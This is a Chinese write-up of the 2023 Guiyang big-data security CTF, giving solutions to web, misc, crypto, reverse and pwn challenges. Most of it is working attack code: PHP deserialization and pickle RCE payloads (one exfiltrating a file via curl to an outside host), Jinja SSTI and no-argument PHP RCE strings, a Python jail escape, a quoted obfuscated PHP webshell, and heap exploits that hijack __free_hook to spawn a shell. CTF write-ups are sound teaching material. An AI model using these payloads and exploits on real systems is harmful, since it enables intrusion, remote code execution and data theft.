2023贵阳大数据安全精英对抗赛WP

1. Web
   1. 仔细ping
   2. pop
   3. JUST_LFI
   4. May_be
   5. Hackerconfused
   6. notrce
   7. 完美网站
   8. it ‘s time
   9. 不太喜欢flask的开发
2. Misc
   1. time
   2. 传说中的小黑
   3. wordexcelppt
   4. 图片的秘密
   5. easymisc
   6. cb0x-new
   7. j@il-new
3. Crypto
   1. math
   2. eezzrrssaa
4. Re
   1. rust
5. PWN
   1. easynote
   2. pwn4

贵阳线下约饭局，线下赛是模拟靶场，难度一般，断网比较坑…

Web

仔细ping

扫描文件发现flag.php，利用nl读文件

GET /?ip=nl%20flag.php

pop

利用fast Destruct绕过报错，pop链(TT->des —-> JJ->toString —-> MM->invoke —-> JJ->evil)

<?php
class TT{
    public $key;
    public $c;

}

class JJ{
    public $obj;


}

class MM{
    public $name;
    public $c;
}
$exp = new TT;
$exp->key = new JJ;
$exp->key->obj = new MM;
$exp->key->obj->name = "JJ::evil";
$exp->key->obj->c = "phpinfo();";
echo serialize($exp);

无disable_function

O:2:"TT":2:{s:3:"key";O:2:"JJ":1:{s:3:"obj";O:2:"MM":2:{s:4:"name";s:8:"JJ::evil";s:1:"c";s:18:"system('cat /flag');";}}s:1:"c";N;

JUST_LFI

改的原题

https://ctftime.org/writeup/35786

LFI读文件，获取app.py以及key，直接带回显不行，采用原方式带回显

import base64
import hashlib
import hmac
import pickle
import requests

sekai = "Th1sIIIIIIsAAAsecret"
unicode = str


def tob(s, enc='utf8'):
    return s.encode(enc) if isinstance(s, unicode) else bytes(s)


def touni(s, enc='utf8', err='strict'):
    return s.decode(enc, err) if isinstance(s, bytes) else unicode(s)


def cookie_encode(data, key):
    ''' Encode and sign a pickle-able object. Return a (byte) string '''
    msg = base64.b64encode(pickle.dumps(data, -1))
    sig = base64.b64encode(hmac.new(tob(key), msg, digestmod=hashlib.md5).digest())
    return tob('!') + sig + tob('?') + msg


class PickleRce(object):
    def __reduce__(self):
        return eval, ("os.system('curl http://IP/look?file=`cat /fllll11llaaaa0ggg | base64`')",)


payload = touni(cookie_encode(("user", {"user": PickleRce()}), sekai))
requests.get("http://xx.xx.xx.xx:4902/login", cookies={"user": f"\"{payload}\""})

May_be

php无参数RCE

<?php
highlight_file(__FILE__);
$a = $_GET['a'];
if(';' === preg_replace('/[^\W]+\((?R)?\)/', '', $a))  {
    if (!preg_match("/sess|ion|head|ers|file|na|strlen|info|path|rand|dec|bin|hex|oct|pi|exp|log/i",$a)){
        eval($a);
    }else{
        die("May be you should bypass.");
    }
}else{
    die("nonono");
}
?>

利用全局变量进RCE

a=system(end(reset(get_defined_vars())));&b=ls -al /

cp提权

Hackerconfused

利用glob协议猜后门文件名

构造pop链读文件
Fun::__destruct -> Fun::__toString -> Funny::__toString -> Funny::__destruct

<?php
class SFile{
    public $name;
}
class Funny{
    public $name;
}
class Fun{
    public $secret;
}
// $obj = new Fun;
// $obj -> secret = new SFile;
// $obj -> secret -> name = "glob://backdoor_a5f9d*.php";
$obj = new Fun;
$obj -> secret = new Fun;
$obj -> secret -> secret = new Funny;
$obj -> secret -> secret -> name = "backdoor_a5f9d3.php";
echo base64_encode(serialize($obj));

后门文件

爆破解密，获取webshell密码

<?php
$erzo_f851f55b=[base64_decode('ZmxhZ3sjX2FiY2RlZn0='),base64_decode('ZmxhZ3tiMHdfYjB3fQ=='),base64_decode('ZmxhZ3t0ZXRfZmxhZ30='),base64_decode('ZmxhZ3s5OSF6elN3Y30='),base64_decode('ZmxhZ3tkZWJ1R19mdHd9'),base64_decode('ZmxhZ3toZWxsX3llYWh9'),base64_decode('ZmxhZ3t0NHN0fQ==')];$igxc_9ce88802='';$bbmg_1b267619=0;foreach($erzo_f851f55b as&$djkg_417c4fa3){$igxc_9ce88802=$djkg_417c4fa3[$bbmg_1b267619].$igxc_9ce88802;$bbmg_1b267619++;};if(isset($_GET[$igxc_9ce88802])){$grxe_fd6b6fc9=$_GET[$igxc_9ce88802];$pgck_32cfe6c1=base64_decode($grxe_fd6b6fc9);$jipp_8a561003=substr($pgck_32cfe6c1,5,-5);echo $jipp_8a561003;system($jipp_8a561003);}else{echo base64_decode('NDA0');};
//pass 4h{galf

flag{73XF7TntgDXrK3dQXSBvhuy3QJTH4vvr}

notrce

<?php
highlight_file(__FILE__);
error_reporting(0);
$c=$_POST['c'];
if(!preg_match("/vi|less|tail|head|od|sh|echo|touch|re|mv|rm|cat|ls|tac|more|cut|curl|wget|base|>|<|`|\*|\\$|\\\/i",$c)){
    exec($c);
}else{
    die("hacker");
}

没过滤引号、问号、sed

完美网站

文件包含读tupian.png，下载下来

一个简单计算，放Burp爆破

it ‘s time

Python SSTI

遍历可用类

{%print(0|attr("\x5f\x5f\x63\x6c\x61\x73\x73\x5f\x5f")|attr("\x5f\x5f\x62\x61\x73\x65\x73\x5f\x5f")|attr("\x5f\x5f\x67\x65\x74\x69\x74\x65\x6d\x5f\x5f")(0)|attr("\x5f\x5f\x73\x75\x62\x63\x6c\x61\x73\x73\x65\x73\x5f\x5f")()|attr("\x5f\x5f\x67\x65\x74\x69\x74\x65\x6d\x5f\x5f")(202)|attr("\x5f\x5f\x69\x6e\x69\x74\x5f\x5f")|attr("\x5f\x5f\x67\x6c\x6f\x62\x61\x6c\x73\x5f\x5f"))%}

os._wrap_close调popen

{%print(0|attr("\x5f\x5f\x63\x6c\x61\x73\x73\x5f\x5f")|attr("\x5f\x5f\x62\x61\x73\x65\x73\x5f\x5f")|attr("\x5f\x5f\x67\x65\x74\x69\x74\x65\x6d\x5f\x5f")(0)|attr("\x5f\x5f\x73\x75\x62\x63\x6c\x61\x73\x73\x65\x73\x5f\x5f")()|attr("\x5f\x5f\x67\x65\x74\x69\x74\x65\x6d\x5f\x5f")(117)|attr("\x5f\x5f\x69\x6e\x69\x74\x5f\x5f")|attr("\x5f\x5f\x67\x6c\x6f\x62\x61\x6c\x73\x5f\x5f")|attr("\x5f\x5f\x67\x65\x74\x69\x74\x65\x6d\x5f\x5f")("\x70open")("\x63\x61\x74\x20\x2f\x66\x31\x61\x67\x5f\x67\x34\x6c\x66\x63\x64\x65\x63\x64\x64\x65\x66\x65\x77\x66\x65\x62\x67\x65")|attr("read")())%}

不太喜欢flask的开发

弱口令、猜jwt key 也为tomcat

发现还是SSTI，发现过滤了下划线 read，部分编码绕过读文件

Misc

time

时间戳

chr(int(os.path.getmtime(file.txt)-1124789000))
// flag{e30da940eef9718f1dbc4a0d0cde1ecb}

传说中的小黑

分离之后解密获取密码，补个jpg头

FFD8FFE0

wordexcelppt

kali打开发现隐藏xml

base64转图片

图片的秘密

easymisc

docker load –input ./game.tar

559.gif拖出来 拼二维码

cb0x-new

char * test(char *aaa){
 puts(aaa);
}

Base64 encode

j@il-new

python jail逃逸

"(__builtins__:=__import__('os'))and(lambda:system)()('sh')

from pwn import remote
payload = "(__builtins__:=__import__('os'))and(lambda:system)()('sh')"
io = remote("47.93.30.67", 62091)
io.sendlineafter(b': ', payload.encode())
io.interactive()

Crypto

math

from sage.all import *

E = Matrix(GF(71),[[48,11,39,15,22,11,52,59,39,11,61],
[16,56,43,35,36,48,40,9,19,50,65],
[10,48,40,29,70,29,12,33,36,27,67],
[57,38,26,61,64,70,37,45,70,1,39],
[58,44,20,58,26,42,31,33,10,28,69],
[26,55,27,57,69,45,52,62,55,6,24],
[45,10,4,65,16,60,54,45,25,22,32],
[33,20,15,12,25,56,15,70,44,25,69],
[30,62,23,9,45,15,70,0,20,20,15],
[24,1,41,24,70,70,42,59,18,0,29],
[0,2,23,17,67,52,57,68,58,65,46]])

hint1 = Matrix(GF(71),[[29,60,16,59,40,4,34,57,1,55,67],
[9,1,44,67,5,20,30,6,42,66,25],
[44,1,24,69,24,23,3,43,42,20,52],
[47,63,2,7,50,35,11,22,59,35,0],
[19,7,36,59,64,2,50,47,30,7,31],
[19,24,48,2,32,41,60,43,50,60,32],
[31,11,62,11,68,27,57,4,66,38,46],
[25,30,63,52,36,65,61,25,22,4,64],
[38,35,39,2,43,39,67,57,19,26,21],
[14,25,14,40,30,52,70,45,70,5,55],
[10,6,18,32,3,20,23,52,25,45,27]])

hint2=Matrix(GF(71),[[25,14,12,18,22,12,0,68,21,57,61],
[34,23,10,47,25,26,61,26,70,6,20],
[31,28,23,42,63,21,19,16,21,20,14],
[27,48,28,17,1,64,30,49,4,62,48],
[51,67,8,28,8,6,5,5,19,27,5],
[25,30,48,41,8,55,10,18,61,38,35],
[8,45,69,64,55,33,15,21,3,41,59],
[53,15,56,53,14,3,52,0,15,40,48],
[31,63,42,18,37,56,32,5,70,11,15],
[56,15,3,46,5,68,24,70,64,27,25],
[44,69,65,13,70,17,16,30,39,56,62]])

hint3=Matrix(GF(71),[[64,53,46,34,58,23,63,8,58,17,34],
[9,29,67,42,10,35,16,53,29,55,53],
[46,20,7,56,47,20,61,38,11,37,67],
[54,0,53,26,38,46,62,18,9,33,57],
[54,44,59,53,18,40,58,56,38,40,45],
[37,24,10,29,41,5,58,24,20,46,49],
[19,63,18,7,37,46,41,62,58,59,21],
[60,45,44,12,21,9,63,67,50,31,18],
[36,68,19,1,0,61,34,49,21,11,58],
[5,35,26,32,36,41,35,12,5,25,27],
[51,42,69,16,28,28,5,8,42,26,19]])

U = hint2/hint1
R = (hint3/U/hint1/U/hint1/U/hint1/U/hint1).inverse()
A = U.inverse()*E-R
alphabet = '=0123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ$!?_{}<>'
flag = ''
for k in range(24):
    i, j = 5*k // 11, 5*k % 11
    flag+=alphabet[A[i, j]]
print('flag{'+flag+'}')

eezzrrssaa

from Crypto.Util.number import *


q = 863666614243448299685073534539782091614466038667659466359664255833879357401208752356758391473753149783695523347
ps = [488430779430824599064935338391249442829022539899115535143196485163487049206340136142789020350176476554441378462595965038290365842362034176672340569719593003574222248527447206361459719954322885881075726676950555671635007363, 707157149197462658139117084378634522562212403870035237598970809858394732217372944239689355077884840011520921058759306333833289658731807522052892377679354636501446734633867023331470805974187027036109531714774435994689042891, 476172773176400166870512700278283739900716339392176146031791100542596627419155254113738721222559386964568077259931246639803960023216418997484355347182274626554844693011339867671881591249587444088969603398209425951467440211, 479577456885290037281759580853233626951314430312455485422558946021203602708559915552877926123425413442096439066002524196474514162220000152373758925097140843218665566655451970747063255562540421337155353658793225970423042099]
n = 98507292107212647629392277192521724876575060525397166586602724341772322834661685719879043139101436908036967520130509456130010632959287915661915441539615555345261656834100254232656609022587219863738542204349757544278313022268849986380405350778976502504598388632375506019980481343421510001650112826277323670706717869878490374078543128198589764240329950804782453481144228576858436696625100959717702337809834581369797601972108713612318371100605389
c = 57773774305129316009141892175661507569534831447382854914588401185097291538023184369651537398951570363918970263297625149448254614479110835192103043721312687685309489008584881189077640538284919592229456061921760452134520765924458040140450750863491592935761079322474155890093610865852109521471075002695928101302724254321097314555582345987979625286958861654447780330651520542323214097640450289283886871665487690407096815701340627706657525543320274
a2 = -721474313686950040760456718395855289332361081440581115357964297160374075412604063880198191814907640385556239775 % q
b2 = -42522514490869169124681320640539356074221591805568832332992800925663834398026485545017374651679305179842368739 % q
class pwn:
    def __init__(self, a, x, b ):
        self.a = a
        self.x = x
        self.b = b

    def next(self):
        ret = self.x
        self.x = (self.a * self.x + self.b) % q
        return ret


def get_prime(pwn1,pwn2,q):
    while 1:
        linshi = pwn2.next() * q + pwn1.next()
        if isPrime(linshi):
            return linshi

p1, p2 = list(), list()
for i in ps:
    p2 += [int(i//q)]
    p1 += [int(i%q)]
a1, b1 = 202320232023, 320232023202

target= list()
for i in range(len(p1)-1):
    cnt = 0
    now = p1[i]
    while now != p1[i+1]:
        now = (a1*now+b1)%q
        cnt += 1
    target += [cnt]

pwn1 = pwn(a1,p1[-1],b1)
pwn2 = pwn(a2,p2[-1],b2)
ps = [get_prime(pwn1,pwn2,q) for _ in range(3)]
for p in ps:
    if n % p == 0:
        q = n // p
        d = inverse(0x10001, n-p-q+1)
        m = pow(c,d,n)
        flag = long_to_bytes(int(m))
        print(flag)

Re

rust

查看V8发现提示信息

分析V4发现需要爆破的为V8前17位字符

PWN

easynote

#!/usr/bin/python3
# -*- coding:utf-8 -*-

from pwn import *
context.clear(arch='amd64', os='linux', log_level='debug')

def add(size, data):
    sh.sendlineafter(b'choice: ', b'1')
    sh.sendlineafter(b'size: ', str(size).encode())
    sh.sendafter(b'data: ', data)

def delete():
    sh.sendlineafter(b'choice: ', b'2')

def show():
    sh.sendlineafter(b'choice: ', b'3')
    sh.recvuntil(b'Your Note: ')

def edit(data):
    sh.sendlineafter(b'choice: ', b'4')
    sh.sendafter(b'NewData: ', data)

sh = remote('172.17.0.2', 9541)
add(0x1f8, b'\n')
delete()
edit(b'a' * 8)
show()
sh.recvuntil(b'a' * 8)
heap_addr = u64(sh.recvuntil(b'\n', drop=True).ljust(8, b'\0')) - 0x10
success('heap_addr: ' + hex(heap_addr))
add(0x2f8, b'\n')
delete()
add(0x1f8, b'\n')
add(0x2f8, b'\0' * 0x1f8 + p64(0x201))
delete()
add(0x2f8, b'\n')
delete()
edit(p64(heap_addr + 0x10))
show()
add(0x1f8, b'\n')
show()
add(0x1f8, flat({0x4e:7}, filler=b'\0'))
delete()
show()
libc_addr = u64(sh.recvuntil(b'\n', drop=True).ljust(8, b'\0')) - 0x1ecbe0
success('libc_addr: ' + hex(libc_addr))
__free_hook_addr = libc_addr + 0x1eee48
system_addr = libc_addr + 0x52290
edit(flat({0x0:1, 0x80:__free_hook_addr - 8}, filler=b'\0'))
show()
add(0x10, b'/bin/sh\0' + p64(system_addr))
delete()
sh.interactive()

pwn4

#!/usr/bin/python3
# -*- coding:utf-8 -*-

from pwn import *
context.clear(arch='amd64', os='linux', log_level='debug')

def add(index, size, content):
    sh.sendlineafter(b'>> ', b'1')
    sh.sendlineafter(b'index: ', str(index).encode())
    sh.sendlineafter(b'size: ', str(size).encode())
    sh.sendafter(b'content: ', content)

def show(index):
    sh.sendlineafter(b'>> ', b'2')
    sh.sendlineafter(b'index: ', str(index).encode())
    sh.recvuntil(b'content: ')

def delete(index):
    sh.sendlineafter(b'>> ', b'3')
    sh.sendlineafter(b'index: ', str(index).encode())

sh = remote('172.17.0.2', 9541)
add(0, 0x508, b'\n')
add(1, 0x48, b'\n')
add(2, 0x508, b'\n')
add(3, 0x508, b'\n')
add(4, 0x18, b'\n')
add(5, 0x508, b'\n')
add(6, 0x508, b'\n')
add(7, 0x18, b'\n')
delete(0)
delete(3)
delete(6)
delete(2)
add(0, 0x508, b'\n')
add(2, 0x508, b'\n')
add(3, 0x530, b'\0' * 0x508 + p64(0x531)[:6])
delete(2)
delete(5)
add(2, 0x4d8, b'\n')
add(5, 0x530, b'\0' * 0x4f8 + p64(0x521) + p64(0) + p64(0x511))
add(6, 0x4d8, b'\n')
delete(0)
delete(2)
add(0, 0x508, b'\0' * 8)
add(2, 0x4d8, b'\n')
delete(4)
add(4, 0x18, b'\0' * 0x10 + p64(0x530))
delete(5)
add(11, 0x20, b'\n')
show(2)
libc_addr = u64(sh.recvuntil(b'\n', drop=True).ljust(8, b'\0')) - 0x1ecbe0
success('libc_addr: ' + hex(libc_addr))
__free_hook_addr = libc_addr + 0x1eee48
system_addr = libc_addr + 0x52290
add(12, 0x18, b'\n')
delete(12)
delete(4)
add(13, 0x4b0, b'\n')
add(14, 0x28, p64(__free_hook_addr - 8))
add(15, 0x18, b'\n')
add(16, 0x18, b'/bin/sh\0' + p64(system_addr))
delete(16)
sh.interactive()